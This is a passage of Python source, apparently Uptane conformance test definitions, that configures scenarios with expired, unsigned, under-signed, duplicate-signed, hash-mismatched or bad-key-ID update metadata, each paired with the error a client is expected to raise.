UPDATE_ERROR = 'ExpiredMetadata::Snapshot'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'is_expired': True,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampExpiredUptane(Uptane):
'''The image repo has expired timestamp metadata'''
class ImageStep(Step):
UPDATE_ERROR = 'ExpiredMetadata::Timestamp'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'is_expired': True,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetHashMismatchUptane(Uptane):
'''The director has a target with bad hashes'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hash')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetHashMismatchUptane(Uptane):
'''The image repo has a target with bad hashes'''
class ImageStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hash')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootUnmetThresholdUptane(Uptane):
'''The director root metadata has an unmet threshold'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [6]
ROOT_KWARGS = {
'root_keys_idx': [4, 5],
'root_sign_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsUnmetThresholdUptane(Uptane):
'''The director targets metadata has an unmet threshold'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Targets'
TARGETS_KEYS_IDX = [5, 6]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX[0:-1],
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootUnmetThresholdUptane(Uptane):
'''The image repo targets metadata has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0, 6],
'root_sign_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsUnmetThresholdUptane(Uptane):
'''The image repo targets metadata has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Targets'
TARGETS_KEYS_IDX = [1, 6]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX[0:-1],
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotUnmetThresholdUptane(Uptane):
'''The image repo snapshot metadata has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Snapshot'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2, 6]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX[0:-1],
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampUnmetThresholdUptane(Uptane):
'''The image repo timestamp metadata has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Timestamp'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3, 6]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX[0:-1],
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootNonUniqueSignaturesUptane(Uptane):
'''The director root metadata has duplicate signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'root_sign_keys_idx': [4, 4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsNonUniqueSignaturesUptane(Uptane):
'''The director targets metadata has duplicate signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_sign_keys_idx': TARGETS_KEYS_IDX + TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootNonUniqueSignaturesUptane(Uptane):
'''The image repo root metadata has duplicate signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'root_sign_keys_idx': [0, 0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsNonUniqueSignaturesUptane(Uptane):
'''The image repo targets metadata has duplicate signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Targets'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_sign_keys_idx': TARGETS_KEYS_IDX + TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotNonUniqueSignaturesUptane(Uptane):
'''The image repo snapshot metadata has duplicate signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Snapshot'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'snapshot_sign_keys_idx': SNAPSHOT_KEYS_IDX + SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampNonUniqueSignaturesUptane(Uptane):
'''The image repo timestamp metadata has duplicate signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::Timestamp'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'timestamp_sign_keys_idx': TIMESTAMP_KEYS_IDX + TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
################################
class DirectorRootUnsignedUptane(Uptane):
'''The director root metadata has no signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'root_sign_keys_idx': [],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsUnsignedUptane(Uptane):
'''The director targets metadata has no signatures'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_sign_keys_idx': [],
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootUnsignedUptane(Uptane):
'''The image repo root metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'root_sign_keys_idx': [],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsUnsignedUptane(Uptane):
'''The image repo targets metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Targets'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_sign_keys_idx': [],
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotUnsignedUptane(Uptane):
'''The image repo snapshot metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Snapshot'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'snapshot_sign_keys_idx': [],
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampUnsignedUptane(Uptane):
'''The image repo timestamp metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::Timestamp'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'timestamp_sign_keys_idx': [],
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootBadKeyIdsUptane(Uptane):
'''The director root metadata has bad key IDs for the root role'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'BadKeyId'
ROOT_KEYS_IDX = [4]
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': ROOT_KEYS_IDX,
'root_bad_key_ids': ROOT_KEYS_IDX,
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsBadKeyIdsUptane(Uptane):
'''The director root metadata has bad key IDs for the targets role'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_bad_key_ids': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoRootBadKeyIdsUptane(Uptane):
'''The image repo root metadata has bad key IDs for the root role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
ROOT_KEYS_IDX = [0]
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': ROOT_KEYS_IDX,
'root_bad_key_ids': ROOT_KEYS_IDX,
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetsBadKeyIdsUptane(Uptane):
'''The image repo root metadata has bad key IDs for the targets role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets_bad_key_ids': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
